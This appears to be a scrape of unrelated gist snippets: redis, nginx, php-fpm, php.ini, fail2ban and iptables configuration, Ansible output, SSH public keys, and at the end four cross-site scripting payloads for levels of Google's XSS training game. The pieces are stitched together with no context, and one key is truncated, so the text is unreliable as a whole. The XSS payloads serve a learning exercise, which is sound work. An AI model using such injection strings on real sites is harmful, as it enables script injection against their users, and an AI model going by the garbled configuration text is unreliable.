- create a new redis .conf file
$ cp /etc/redis.conf /etc/redis-xxx.conf
- edit /etc/redis-xxx.conf, illustrated as below
...
if ($host ~* ^www\.(.*)) { | |
set $host_without_www $1; | |
rewrite ^(.*) http://$host_without_www$1 permanent; | |
} |
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAlt0RVRZpJv41UEC9NXgGzuWRM5cjnWjC+YleHRba7bJjjI28PdmxMtyQnPp304wfOkDri6LUt9bX0ScNJbx9hddFGR+T8+lG6APGg7MJhsuq7Iwx9a/2phqRCyjjJqRuP+/uMISVBaJ5qcn4lO7ku8mojtbs8kpNFwvkRQFNX8TpmtP/pvdIkAAjUr2sHF5VqT9fuervR0j22ut35Qc7sn6xEM1/x9k2b+KxoIpSvxW+DdvdciJEOdnAGpZQoE6/NXsJOuABxSatxFKNJEf6C078QAcqwJ9J8Qb2HBdSkFGv1TjMOq5AVIsSorzhzaK2EnZgcnFP3UHinaC0mDu5RQ== [email protected] | |
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDff/AxJ9ulxQUZu+KrUB3OQdM86WNJDXcoX9sQLKiBBdGdCJ5ZBh9g2zpadMJKc6DD+yJCoClhGoWjznpLyNubO7Q/1JEpIl9TmZDWx87sFVjLmZIanWlmhQVh1gyeYyjdLnuPV+2FCH3gNjqnUnVYCPy0jKa7inoayf+38sJT+74m/jhSf4tRVSgrZpGGsdRteL1O7QCjFSDbHsVuLb0o4Pa4cwqs+HrKpW6i+Hy2/ZNXrpVghVR5inSeEd7/GOcCxWV0SKhYS/aFAq05/Ukey9lwQDSrGSkyRxbD900L/9m2k6jN8wEIlwC0kadJLBxPfT3A5yJ5jF16fs11y15f [email protected] | |
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDM/CuhYt2hv42jyNR8aJ9xc7kjZx7RwYfJK4F5cSBmOhSCzmpSsoRE9FH0t33Lbj8lpcFM7VV5D18YVu1hlCwNECasaAdZ9HemK7DVMGiiJEQRw0fXpBnzK027G2O5p6XAiCGOUkKCwdn8bunukaurc9dQ |
ansible-playbook -i hosts setup.yml --extra-vars="username=wp website_name=wpfc.com website_type=wpfc" | |
PLAY [Welcome to AnsiPress Setup] ***************************************************************************************************************************** | |
TASK [Installing python3-simplejson for Ansible, Hold on...] ************************************************************************************************** | |
changed: [AnsiPress.ubuntu] | |
changed: [AnsiPress.debian] | |
TASK [Gathering Facts] **************************************************************************************************************************************** |
$ cp /etc/redis.conf /etc/redis-xxx.conf
...
[DEFAULT] | |
# Ban hosts for one hour: | |
bantime = 43200 | |
# Override /etc/fail2ban/jail.d/00-firewalld.conf: | |
banaction = iptables-multiport | |
[sshd] | |
enabled = true |
<a href="/hire/"><img style="position: fixed; top: -15px; right: -20px; border: 0;" src="https://camo.githubusercontent.com/38ef81f8aca64bb9a64448d0d70f1308ef5341ab/68747470733a2f2f73332e616d617a6f6e6177732e636f6d2f6769746875622f726962626f6e732f666f726b6d655f72696768745f6461726b626c75655f3132313632312e706e67" alt="Hire Me" data-canonical-src="https://s3.amazonaws.com/github/ribbons/forkme_right_darkblue_121621.png"></a> |
[PHP] | |
engine = On | |
short_open_tag = Off | |
asp_tags = Off | |
precision = 14 | |
output_buffering = 4096 | |
zlib.output_compression = Off | |
implicit_flush = Off | |
unserialize_callback_func = | |
serialize_precision = 17 |
[www] | |
user = nginx | |
group = nginx | |
listen = 127.0.0.1:9000 | |
listen.owner = nginx | |
listen.group = nginx | |
pm = ondemand | |
pm.max_children = 100 | |
pm.start_servers = 20 | |
pm.min_spare_servers = 10 |
# Modify this file accordingly for your specific requirement. | |
# http://www.thegeekstuff.com | |
# 1. Delete all existing rules | |
iptables -F | |
# 2. Set default chain policies | |
iptables -P INPUT DROP | |
iptables -P FORWARD DROP | |
iptables -P OUTPUT DROP |
https://xss-game.appspot.com/level1/frame?query=<svg onload=alert(1)> | |
<img src=x onerror=alert(1)> | |
https://xss-game.appspot.com/level3/frame#3'onerror=alert(1)> | |
https://xss-game.appspot.com/level4/frame?timer=')%3Balert(1)%3Bvar b=(' |